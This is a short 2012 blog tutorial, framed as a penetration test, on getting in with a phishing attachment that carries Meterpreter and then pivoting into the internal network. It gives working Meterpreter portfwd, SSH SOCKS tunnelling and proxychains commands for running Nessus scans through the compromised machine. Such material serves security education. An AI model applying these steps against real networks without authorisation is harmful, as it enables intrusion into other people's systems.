Thursday, January 5, 2012

Metasploit~ Nessus Scanning through a Metasploit Meterpreter Session


This tutorial is successful after installation of SSH on victim's system. Go to Step 1.

Scenario: You are doing a penetration test. The client's internet face is locked down pretty well. No services are exposed externally and only HTTP/HTTPS are allowed OUT of

the corporate firewall. You email in a carefully crafted email with the meterpreter attacked. An accommodating users is more than happy to click your attachment giving you

meterpreter access to their machine. Now what? How about using Nessus to scan all the services on their internal network? Here is a tutorial on how to do it.

The Players
Attacker 192.168.1.3
Victim 192.168.1.9

Step 1 - After you have meterpreter access install OpenSSH on the victim's computer. See this for instructions.

Step 2 - After you've installed OpenSSH and setup your account use Meterpreters PORTFWD command to forward a port from the attacker's machine to the SSH listener on the

victim's machine. For example:

meterpreter> portfwd add -L 192.168.1.3 -l 8000 -r 192.168.1.9 -p 22

This command sets up a listener on port 8000 of the attacker's IP (192.168.1.3) and forwards packets to port 22 on the victim's machine (192.168.1.9).


Step 3 - SSH into the portfwd port you just created and setup a dynamic port forwarder on your machine. For example:

# ssh -D 127.0.0.1:9000 -p 8000 username@192.168.1.3

This command sets up a SOCKS4 proxy on port 9000 which is forwarded through the SSH session on the victim.

Step 4 - Use PROXYCHAINS to forward your nessusd traffic through the SOCKS4 listener on port 9000. This is as simple as changing the TCP port on the last line of

/etc/proxychains.conf from its default of 9050 to port 9000 and launching nessusd through proxychains as follows:

# proxychains /usr/sbin/nessusd -D

Step 5 - Start the nessus client and do you scan.

 

The Hacker News